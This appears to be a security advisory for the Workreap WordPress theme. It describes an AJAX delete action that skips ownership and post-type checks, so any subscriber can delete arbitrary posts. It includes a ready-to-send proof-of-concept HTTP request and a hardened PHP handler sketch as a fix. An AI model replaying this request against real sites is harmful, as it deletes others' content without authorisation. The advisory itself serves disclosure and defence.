When processing the workreap_addons_service_remove action, the theme does not verify that the addon service belongs to the user issuing the request, or even that the target is an addon service at all. Any user can therefore delete any post by knowing or guessing its ID.

POST /testt/wp-admin/admin-ajax.php HTTP/2
Host: host
Cookie: [Subscriber+]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 65

action=workreap_addons_service_remove&id=6191&security=295c6a26b2
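
One way the two missing checks (object type and ownership) could be enforced in the AJAX handler, as an added example that is not the theme's or the vendor's code. The post type slug, the nonce action name and the function name are placeholders, since the page does not give the theme's real values.

```php
<?php
// Added example: hardened handler sketch, NOT the Workreap theme's own code.
// Assumed/placeholder names: EXAMPLE_ADDON_POST_TYPE, EXAMPLE_NONCE_ACTION,
// example_addons_service_remove().
const EXAMPLE_ADDON_POST_TYPE = 'example-addon-service'; // placeholder slug
const EXAMPLE_NONCE_ACTION    = 'example_ajax_nonce';    // placeholder nonce action

function example_addons_service_remove() {
    // 1. CSRF check on the 'security' field. A valid nonce only proves the
    //    request came from a logged-in session; it says nothing about ownership.
    if ( ! check_ajax_referer( EXAMPLE_NONCE_ACTION, 'security', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce.' ), 403 );
    }

    // 2. Normalise the id to a non-negative integer and load the post.
    $post_id = isset( $_POST['id'] ) ? absint( wp_unslash( $_POST['id'] ) ) : 0;
    $post    = $post_id ? get_post( $post_id ) : null;

    // 3. Object-type check: the target must be an addon service, not any post.
    $is_addon = $post && EXAMPLE_ADDON_POST_TYPE === $post->post_type;

    // 4. Ownership check: the target must belong to the requesting user.
    $is_owner = $post && (int) $post->post_author === get_current_user_id();

    if ( ! $is_addon || ! $is_owner ) {
        // Same response for "missing", "wrong type" and "not yours", so the
        // endpoint cannot be used to probe which ids exist.
        wp_send_json_error( array( 'message' => 'Addon service not found.' ), 404 );
    }

    if ( ! wp_delete_post( $post_id ) ) {
        wp_send_json_error( array( 'message' => 'Delete failed.' ), 500 );
    }
    wp_send_json_success( array( 'deleted' => $post_id ) );
}

// Stands in for the theme's handler on the authenticated hook only;
// no wp_ajax_nopriv_ registration.
add_action( 'wp_ajax_workreap_addons_service_remove', 'example_addons_service_remove' );
```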